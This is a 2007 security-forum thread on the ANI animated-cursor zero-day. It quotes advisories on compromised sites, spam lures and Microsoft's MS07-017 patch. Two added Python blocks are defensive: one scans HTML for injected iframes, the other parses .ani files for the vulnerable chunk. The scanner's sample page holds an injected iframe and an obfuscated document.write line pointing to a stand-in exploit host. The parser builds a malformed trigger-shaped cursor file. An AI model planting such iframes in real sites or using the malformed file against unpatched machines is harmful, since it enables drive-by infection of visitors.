
Thread: 0-Day vuln Exploit in the wild - Animated Cursor

#11 AplusWebMaster (Adviser Team; joined Oct 2005; USA; 6,881 posts)

    FYI...

    MS to Release Out-of-Schedule Patch for ANI Vuln
    - http://isc.sans.org/diary.html?storyid=2555
    Last Updated: 2007-04-02 03:39:56 UTC
    "...The Microsoft Security Response Center blog reports* that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."
    This is further supported here: http://www.microsoft.com/technet/sec...n/advance.mspx ."

    * http://preview.tinyurl.com/35tyyt
    (MSRC)

The machine has no brain.
......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...

#12 AplusWebMaster

    FYI...

    Compromised sites using ANI exploit code
    - http://www.websense.com/securitylabs...php?BlogID=119
    Apr 2 2007 3:15PM ~ "Websense's ThreatSeeker(tm) technology has discovered that a large set of websites have been compromised within the Asia Pacific Region and have embedded IFRAMES within them pointing to a site that is hosting the ANI exploit code. An IFRAME or "invisible frame" is an element which makes it possible to embed another HTML document inside the main document. From Wikipedia: http://en.wikipedia.org/wiki/Iframe.
    Although we are tracking hundreds of other sites that are hosting ANI exploit files, this alert pertains to one group of sites that are all connecting to the same host. Many of the sites appear to be running online blogs or message boards. Most sites have embedded IFRAMEs on all pages leading to a main set of sites which are hosting the exploit code. The number of unique sites currently up and running for this one attack is greater than 50 and the number of pages is greater than 500. Assuming users connect to the sites, they will be redirected to two unique locations which are hosting exploit code which in turn downloads and installs a file called "ad.exe". The file includes a generic password stealer and is not detected well by most Antivirus companies (MD5 0c9217553871d3eb5f20b553d91a098b)..."

    (Screenshots available at the URL above.)


#13 AplusWebMaster

    FYI...

    Malicious Code: Email Lures for ANI Zero-Day
    - http://www.websense.com/securitylabs...hp?AlertID=764
    April 03, 2007 ~ "Websense Security Labs(TM) has discovered a large email spam run that includes links to sites that are hosting ANI exploit code. Users receive an email with the subject line "Hot Pictures of Britiney Speers" that is written in HTML and has anti-spam avoidance text within the HTML comments. Users who click on the links are redirected to one of several websites that we are tracking. The sites contain obfuscated JavaScript. The decoded JavaScript sends all users to the same website, which is hosting the exploit code. When users connect, a file is downloaded and installed without any end-user interaction. The file is called 200.exe with the MD5 of b017cae51e4498c309690b8936f2fa79. The binary file appears to be a new variant of a file infector with operating system hooks and spamming capabilities. A more complete analysis will soon appear on our blog. The main server that hosts the exploit code is hosted in Russia and has been used by groups that have installed rootkits, password stealing Trojans, and other nefarious code in the past..."

    (Screenshots available at the URL above.)


    > http://www.websense.com/securitylabs...php?BlogID=120
    Apr 3 2007 ~ "This is a follow-up to our post from yesterday (see: http://www.websense.com/securitylabs...php?BlogID=119 ). We are now actively tracking more than 450 unique websites which have been compromised. Most of the sites have ALL pages infected within the site, which adds up to tens of thousands of pages with exploit code links on them. We are working with several groups to attempt to get these sites shut down. As previously stated, users who visit one of the thousands of pages will be infected with a generic password stealer that will run without any user-interaction..."

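The compromise pattern Websense describes in the two posts above (an IFRAME injected into every page of a hacked site, or obfuscated JavaScript that document.write()s one) can be checked for offline on saved HTML. The scanner below is an added example written for this thread, not Websense code or anything from the original posts; the sample page, the hostnames (forum.example, exploit.example) and the function names are constructed for illustration.

```python
"""Flag the injected-IFRAME pattern in saved HTML: frames pointing off-site,
zero-sized or CSS-hidden frames, and script that writes an unescape()d payload."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

ZERO = re.compile(r'^\s*0+(px|%)?\s*$')   # width="0", height="0px", ...


class InjectionScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()  # host the page was fetched from
        self.findings = []                  # list of (kind, detail)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self._in_script = True
            return
        if tag != 'iframe':
            return
        a = {name: (value or '') for name, value in attrs}
        src = a.get('src', '')
        host = (urlparse(src).hostname or '').lower()
        reasons = []
        if host and host != self.page_host:
            reasons.append(f'off-site src host {host}')
        if ZERO.match(a.get('width', 'x')) or ZERO.match(a.get('height', 'x')):
            reasons.append('zero-sized frame')
        style = a.get('style', '').replace(' ', '').lower()
        if 'display:none' in style or 'visibility:hidden' in style:
            reasons.append('hidden by CSS')
        if reasons:
            self.findings.append(('iframe', f'{src}: ' + ', '.join(reasons)))

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        # The usual obfuscation: the frame is not in the HTML at all but is
        # written at runtime from a percent-encoded string.
        if self._in_script and 'document.write' in data and 'unescape(' in data:
            self.findings.append(('script', 'document.write(unescape(...)) payload'))


def scan_page(html, page_host):
    """Return the list of (kind, detail) findings for one saved page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: one legitimate same-site widget frame, one injected
# zero-sized off-site frame, and one obfuscated script that writes another.
SAMPLE_PAGE = """<html><body>
<h1>Forum index</h1>
<iframe src="/widgets/latest-posts" width="400" height="120"></iframe>
<iframe src="http://exploit.example/ani/" width="0" height="0"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//exploit.example/b/%22%3E'))</script>
</body></html>"""

if __name__ == '__main__':
    for kind, detail in scan_page(SAMPLE_PAGE, 'forum.example'):
        print(kind, detail)
```

Run it over a crawl of a site's saved pages with the site's own hostname; a frame that is off-site, zero-sized and present on every page is the signature described above, and the script heuristic catches the variant that never puts an iframe tag in the static HTML.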

#14 AplusWebMaster

    MS07-017 patch released


#15 md usa spybot fan (Spybot Advisor Team [Retired]; joined Oct 2005; 5,859 posts)

    AplusWebMaster:

    Damn are you on top of this stuff. I checked for Windows updates a half-an-hour ago and there were none. Thanks for your concern and attention to breaking security issues.

    Security Update for Windows XP (KB925902) requires a restart. See you in a few minutes.

    Regards,
    md usa spybot fan

    Getting an answer is one thing, learning is another.


    Microsoft Windows XP Home Edition running on a 2.40GHz Intel® Pentium® 4 Processor with 512 MB of RAM and a 533 MHz System Bus.

#16 AplusWebMaster

    ...on top of this stuff.
    As opposed to the other choice, that's where we need to be.


#17 AplusWebMaster

    FYI...


    MS07-017 / MS07-008 conflict (?) fix...
    - http://forums.spybot.info/showpost.p...1&postcount=27
    "...having problems with the patch..."



#18 AplusWebMaster

    FYI...

    - http://www.pcworld.com/printable/art...printable.html
    April 03, 2007 ~ "Contrary to other reports, Mozilla's Firefox 2.0 is vulnerable to attackers armed with the Windows animated (ANI) cursor exploit... Alexander Sotirov, the vulnerability researcher at Determina who discovered the ANI flaw last December and notified Microsoft of it later that month, yesterday posted a demonstration of an ANI exploit that hijacks a PC when Firefox users are conned into visiting a malicious site... "It turns out that Firefox uses the same vulnerable Windows component to process .ani files, which can be exploited in a way similar to Internet Explorer," Sotirov said... "

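The shared component Sotirov refers to above parses the .ani file's own length fields, which is why every application that loads cursors through it was exposed. The following is an added example, not code from this thread, from Determina or from Microsoft: a small RIFF/ACON walker in Python that flags the shape of the MS07-017 trigger, an 'anih' header chunk declaring a length other than the fixed 36-byte ANIHEADER (after MS05-002 only the first anih chunk was length-checked in LoadAniIcon, so a second, oversized one overflowed the stack buffer). The two sample files are constructed inline, the icon bytes are placeholders, and the function names are mine.

```python
"""Structural check for the MS07-017 (CVE-2007-0038) animated-cursor pattern.
An .ani file is a RIFF container of form type ACON; its 'anih' chunk is a
fixed 36-byte ANIHEADER.  The loader copied the chunk using the length the
file declared, and only the first anih chunk was checked, so a later oversized
anih overflowed the 36-byte stack buffer."""
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine DWORD fields


def _chunk(fourcc, payload):
    """Encode one RIFF chunk: fourcc, little-endian length, data, pad to even."""
    return fourcc + struct.pack('<I', len(payload)) + payload + b'\0' * (len(payload) & 1)


def build_ani(extra=b''):
    """Constructed sample: a one-frame cursor, optionally followed by extra chunks."""
    # cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
    anih = struct.pack('<9I', ANIH_SIZE, 1, 1, 0, 0, 0, 0, 10, 1)
    fram = _chunk(b'LIST', b'fram' + _chunk(b'icon', b'\0' * 22))  # placeholder icon bytes
    body = b'ACON' + _chunk(b'anih', anih) + fram + extra
    return b'RIFF' + struct.pack('<I', len(body)) + body


BENIGN_SAMPLE = build_ani()
# A second anih chunk claiming 4096 bytes but carrying 40: the trigger shape.
EXPLOIT_SAMPLE = build_ani(b'anih' + struct.pack('<I', 0x1000) + b'A' * 40)


def _chunks(data, start, end):
    """Yield (fourcc, declared_size, body_start, body_end, truncated) in [start, end)."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack_from('<I', data, pos + 4)
        body_start = pos + 8
        body_end = body_start + size
        yield fourcc, size, body_start, min(body_end, end), body_end > end
        pos = body_end + (size & 1)   # chunks are padded to an even boundary


def scan_ani(data):
    """Return a list of findings; an empty list means the file is structurally sane."""
    findings = []
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'ACON':
        return ['not a RIFF/ACON animated cursor']
    (riff_size,) = struct.unpack_from('<I', data, 4)
    if riff_size + 8 != len(data):
        findings.append(f'RIFF size {riff_size} does not match file length {len(data)}')
    anih_count = 0

    def walk(start, end):
        nonlocal anih_count
        for fourcc, size, bstart, bend, truncated in _chunks(data, start, end):
            if truncated:
                findings.append(f'{fourcc!r} chunk declares {size} bytes past end of file')
            if fourcc == b'LIST':
                walk(bstart + 4, bend)   # skip the list-type fourcc, recurse into members
            elif fourcc == b'anih':
                anih_count += 1
                if size != ANIH_SIZE:
                    findings.append(f'anih #{anih_count} declares {size} bytes, expected {ANIH_SIZE}')

    walk(12, len(data))
    if anih_count == 0:
        findings.append('no anih header chunk')
    elif anih_count > 1:
        findings.append(f'{anih_count} anih chunks (a well-formed cursor has one)')
    return findings


def is_exploit_candidate(data):
    """True when any finding concerns the anih header chunk."""
    return any('anih' in f for f in scan_ani(data))


if __name__ == '__main__':
    for name, sample in (('benign', BENIGN_SAMPLE), ('exploit', EXPLOIT_SAMPLE)):
        print(name, scan_ani(sample) or 'clean')
```

Because the loader is reached from any path that renders a cursor, the check is worth running on files regardless of extension (the exploits in this thread were served from web pages, not as .ani downloads); the walker only trusts the bytes, not the name.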

#19 AplusWebMaster

    FYI...

    ASUS gets ANI'd
    - http://www.securityfocus.com/brief/477
    2007-04-06 ~ "...The Web site of motherboard maker ASUS reportedly* got hit by a group of online vandals, who added an iframe redirect to a malicious download site that attempts to infect visitors via the ANI flaw. Leveraging hacked, but legitimate, Web sites to propagate malicious code has become a major vector to compromise end users..."
    * http://www.viruslist.com/en/weblog?weblogid=208187358


#20 AplusWebMaster

    FYI...

    Compromised Web Servers Plotted
    - http://www.websense.com/securitylabs...php?BlogID=122
    Apr 9 2007 ~ "...Now... are more than 2000 unique sites that are hosting exploit code and/or are compromised and are pointing to machines that host exploit code. There are two main attacks that comprise the majority of these sites. The first set we believe are one of the first groups to start using the zero-day exploits in the wild. These are attacks that started in the China region and appear to be created by groups within the Asia Pacific Region. The attackers have compromised hundreds of machines and placed IFRAMEs back to the main servers that host the exploit code. In most cases the payload and motivation of these attacks is to gather credentials for online games such as Lineage. Lineage is a very popular online game in Asia.
    The second set of attacks started just a couple of days ago and appear to be from a group in Eastern Europe. This group has been placing exploit code on sites for many years now and has a very resilient infrastructure. They have used WMF, VML, and several other exploits in their routines previously. As of now they have also added the ANI attacks to their arsenal. The payload and motivation is somewhat different however, as they are more known to install rootkits and crimeware which is designed to install form grabbing software and keyloggers in order to compromise end-user banking details. Also in the past they have installed fake anti-spyware software as a distraction and as a means to trick someone into acquiring some anti-spyware software.
    The below map took all the websites we have classified that have been compromised by one of these two parties and plotted them on the map. Note: we plotted by country not by city! What you can see, with some minor exceptions, is that the first attacker set are going after servers, and presumably users in China, whereas the second attacker set are going after servers, and users in America..."

    (Graphic available at the URL above.)

    Last edited by AplusWebMaster; 2007-04-09 at 20:48.
